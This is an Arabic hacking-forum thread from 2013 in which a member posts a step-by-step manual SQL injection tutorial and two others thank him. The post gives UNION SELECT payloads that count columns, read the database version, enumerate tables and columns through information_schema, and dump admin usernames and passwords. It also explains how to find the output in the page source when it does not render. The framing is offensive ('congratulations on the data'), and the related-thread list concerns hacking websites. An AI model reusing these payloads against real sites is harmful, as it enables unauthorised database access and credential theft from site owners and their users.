تحديث الصفحة حل مشكلة عدم ظهور المعلومات في الحقن اليدوي - SQL Injection

Mr.RaaD · 06-18-2013, 06:49 AM

~ بسم الله الرحمن الرحيم ~

أول موضوع لي في المنتدى , اتمنى ينال اعجابكم مشكلة ظهور المعلومات الحقن اليدوي

الموضوع يتكلم عن مشكلة تواجه الاغلب في الحقن اليدوي !

(* انا لا اعلم اذا كان احد مكتشفها من قبلي , لكن انا اكتشفتها بجهدي الشخصي *)

كود PHP:


			
+order+by+6--

طبعا اكيد نقعد نخمن على عدد الاعمدة , نفرض العدد 6

كود PHP:


			
+union+select+1,2,3,4,5,6--

في اغلب الاحيان لا يظهر العمود المصاب !!

تمام نيجي للتخطي مشكلة ظهور المعلومات الحقن اليدوي

نحنا افترضنا في البداية عدد الاعمدة 6

نضيف الامر لإستعراض اصدار قاعدة البيانات :

كود PHP:


			
 +union+select+version(),version(),version(),version(),version(),version()--

تمام , ضفنا الامر وحملت الصفحة زي قبل !!

نيجي نفتح سورس الصفحة - Page Source مشكلة ظهور المعلومات الحقن اليدوي

نقرا سورس الصفحة وندور , حتى نلاقي الاصدار مشكلة ظهور المعلومات الحقن اليدوي

تمام جبنا الاصدار نفرض

كود PHP:


			
 5.0.96-community-log

الان بدنا نستعرض جداول الصفحة !

نستعرض الجداول :

كود PHP:


			
 +union+select+group_concat(table_****),group_concat(table_****),group_concat(table_****),group_concat(table_****),group_concat(table_****),group_concat(table_****)+from+information_schema.tables+where+table_schema=database()--

زي ما عملنا من قبل , نفتح سورس الصفحة - Page Source

طبعا الجداول رح تظهر في نفس المكان يلي ظهرت فيه القاعدة

الان نفرض الجدول :: Admin

نقوم بتشفير الجدول بالهيكس , من خلال الموقع :

[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]

عشان تتعرف عليه الاوامر

كود PHP:


			
0x41646d696e

ما رح اشرح شو لازم تعدلو بالاوامر , معروفة مشكلة ظهور المعلومات الحقن اليدوي

يصبح الامر هكذا :

كود PHP:


			
 +union+select+group_concat(column_****),group_concat(column_****),group_concat(column_****),group_concat(column_****),group_concat(column_****),group_concat(column_****)+from+information_schema.columns+where+table_****=0x41646d696e

تمام زي ما عملنا قبل , نستعرض سورس الصفحة - Source Page

الاعمدة تكون موجودة في نفس المكان يلي لقينا فيه اصدار القاعدة والجداول مشكلة ظهور المعلومات الحقن اليدوي

نفرض الاعمدة :: user****,password

نضيف الامر :

كود PHP:


			
 +union+select+group_concat(user****,0x3a,password),group_concat(user****,0x3a,password),group_concat(user****,0x3a,password),group_concat(user****,0x3a,password),group_concat(user****,0x3a,password),group_concat(user****,0x3a,password)+from+Admin

نفتح سورس الصفحة - Page Source

تكون البيانات موجودة في نفس المكان الي استخرجنا منه المعلومات السابقة مشكلة ظهور المعلومات الحقن اليدوي

ومبروك عليك البيانات !!

أعتقد الفكرة وصلت

Ш A I T I И Ğ · 06-18-2013, 07:07 AM

موضوعك يبيله كاسة شاي للتركيز

بارك الله فيك

عبد الصمد · 06-18-2013, 02:46 PM

باراك الله فيك
واحي فيك جهدك والاتكال على نفسك
جميل جا واصل

06-18-2013, 06:49 AM	المشاركة رقم: 1
الكاتب Mr.RaaD .:: عضو جديد ::. المعلومات التسجيل: Jun 2013 العضوية: 182779 المشاركات: 3 بمعدل : 0.00 يوميا الإتصال	المنتدى حل مشكلة عدم ظهور المعلومات في الحقن اليدوي - SQL Injection ~ بسم الله الرحمن الرحيم ~ أول موضوع لي في المنتدى , اتمنى ينال اعجابكم مشكلة ظهور المعلومات الحقن اليدوي الموضوع يتكلم عن مشكلة تواجه الاغلب في الحقن اليدوي ! (* انا لا اعلم اذا كان احد مكتشفها من قبلي , لكن انا اكتشفتها بجهدي الشخصي ) كود PHP: `+order+by+6--` طبعا اكيد نقعد نخمن على عدد الاعمدة , نفرض العدد 6 كود PHP: `+union+select+1,2,3,4,5,6--` في اغلب الاحيان لا يظهر العمود المصاب !! تمام نيجي للتخطي مشكلة ظهور المعلومات الحقن اليدوي نحنا افترضنا في البداية عدد الاعمدة 6 نضيف الامر لإستعراض اصدار قاعدة البيانات : كود PHP: `+union+select+version(),version(),version(),version(),version(),version()--` تمام , ضفنا الامر وحملت الصفحة زي قبل !! نيجي نفتح سورس الصفحة - Page Source مشكلة ظهور المعلومات الحقن اليدوي نقرا سورس الصفحة وندور , حتى نلاقي الاصدار مشكلة ظهور المعلومات الحقن اليدوي تمام جبنا الاصدار نفرض كود PHP: `5.0.96-community-log` الان بدنا نستعرض جداول الصفحة ! نستعرض الجداول : كود PHP: `+union+select+group_concat(table_*),group_concat(table_),group_concat(table_),group_concat(table_),group_concat(table_),group_concat(table_)+from+information_schema.tables+where+table_schema=database()--` زي ما عملنا من قبل , نفتح سورس الصفحة - Page Source طبعا الجداول رح تظهر في نفس المكان يلي ظهرت فيه القاعدة الان نفرض الجدول :: Admin نقوم بتشفير الجدول بالهيكس , من خلال الموقع : [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل] عشان تتعرف عليه الاوامر كود PHP: `0x41646d696e` ما رح اشرح شو لازم تعدلو بالاوامر , معروفة مشكلة ظهور المعلومات الحقن اليدوي يصبح الامر هكذا : كود PHP: `+union+select+group_concat(column_),group_concat(column_),group_concat(column_),group_concat(column_),group_concat(column_),group_concat(column_)+from+information_schema.columns+where+table_=0x41646d696e` تمام زي ما عملنا قبل , نستعرض سورس الصفحة - Source Page الاعمدة تكون موجودة في نفس المكان يلي لقينا فيه اصدار القاعدة والجداول مشكلة ظهور المعلومات الحقن اليدوي نفرض الاعمدة :: user,password نضيف الامر : كود PHP: `+union+select+group_concat(user,0x3a,password),group_concat(user,0x3a,password),group_concat(user,0x3a,password),group_concat(user,0x3a,password),group_concat(user,0x3a,password),group_concat(user*,0x3a,password)+from+Admin` نفتح سورس الصفحة - Page Source تكون البيانات موجودة في نفس المكان الي استخرجنا منه المعلومات السابقة مشكلة ظهور المعلومات الحقن اليدوي ومبروك عليك البيانات !! أعتقد الفكرة وصلت التعديل الأخير تم بواسطة Mr.RaaD ; 06-18-2013 الساعة 06:20 PM*

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق
انواع عرض الموضوع
العرض العادي الانتقال إلى العرض المتطور الانتقال إلى العرض الشجري

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
طلب شرح الحقن اليدوي كامل	CrSmS	[ مشاكل وحلول اختراق المواقع ]	4	05-07-2013 02:46 PM
اوامر الحقن اليدوي	libyan boy	[ SQL-injection ]	6	02-06-2013 07:15 PM
نقأشش .. الحقن الالي +الحقن اليدوي=مميزات عيوب .. لخبراء الحقن sql	وهوـوب القصيم	[ SQL-injection ]	32	01-23-2012 10:00 PM
مشكلة عند رفع شل في الوورد بريس ظهور الصفحة البيضاء	mr.nawaf	[ مشاكل وحلول اختراق المواقع ]	7	01-17-2012 07:41 AM
تخطي مشكلة الفلتر عند محاولة الحقن بثغرات SQL Injection	PrO SpY	[ SQL-injection ]	37	01-05-2009 02:53 PM

الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)